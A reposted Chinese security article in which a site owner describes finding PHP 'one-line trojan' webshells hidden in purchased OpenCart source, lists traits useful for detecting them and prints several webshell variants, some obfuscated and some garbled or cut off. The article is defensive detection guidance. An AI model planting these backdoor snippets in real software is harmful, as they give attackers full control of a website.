黑基网 首页 学院 网络安全 查看内容

不幸中招“一句话木马”,估计这些方法也没能彻底查杀

2017-8-28 02:04| 投稿: xiaotiger |来自: 互联网

摘要: 几年前在某宝上购买了定制过的opencart源码,基本能够符合业务需求。由于当时刚出社会,经历不足没有安全意识。没有对购买的源码进行全面的木马查杀就直接部署上线了。近日网站被攻击,通过排查发现代码中隐藏了很多 ...

几年前在某宝上购买了定制过的opencart源码,基本能够符合业务需求。由于当时刚出社会,经历不足没有安全意识。没有对购买的源码进行全面的木马查杀就直接部署上线了。近日网站被攻击,通过排查发现代码中隐藏了很多“一句话木马”。此类木马隐蔽性极好、排查难度大、变种繁多,“一句话木马”配合“中国菜刀”使用,可谓功能强大,威力无穷。入侵者可以完全控制整个网站,到处隐藏该类后门代码。

网站是部署在美国的web空间上,通过cpanel管理,首先通过cpanel面板上的病毒查杀功能发现了木马,该功能仅能扫出比较简单的“一句话木马”。具体如下图所示

cpanel面板提供的病毒扫描软件

查杀中扫描出的木马

查杀完成清理木马

木马文件内容如下:

木马文件内容

仅通过cpanel提供的查杀并不能完全找出所有的后门代码,下面通过UltraEdit对本地下载好的源码文件夹进行全目录搜索。搜索关键字为eval结果还发现其他隐藏木马,当然不是所有包含eval的都是木马,需要自己判断,通常包含以下特征(个人总结,有不足之处请各位大神不吝赐教):

  • 文件内容为php代码。

  • 其中包含eval,有些超级隐蔽的仅通过eval关键字是查找不出来的。

  • 文件中可能包含加密过的内容。

  • 伪装成其他类型文件,如:图片格式文件。

  • 文件扩展名比较奇怪,非正常扩展名。如下图中所示,扩展名为php-curl。

伪装的后门脚本

再看一下伪装成图片,并放置在图片文件夹中的木马

xx.png为伪装成图片的后门脚本文件

该假图片内容如下:

xx.png的内容

下面举几个“一句话木马”的例子:

  • 仅用GET函数就构成了木马

<?php $_GET[a]($_GET[b]);?>

  • 隐蔽变种1

<?php ([email protected]$_GET[2])[email protected]$_($_POST[1])?>

  • 隐蔽变种2

<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

  • 避开eval关键字

($b4dboy = $_POST['b4dboy']) && @preg

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:http://www.toutiao.com/i6458587021689487886/

免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部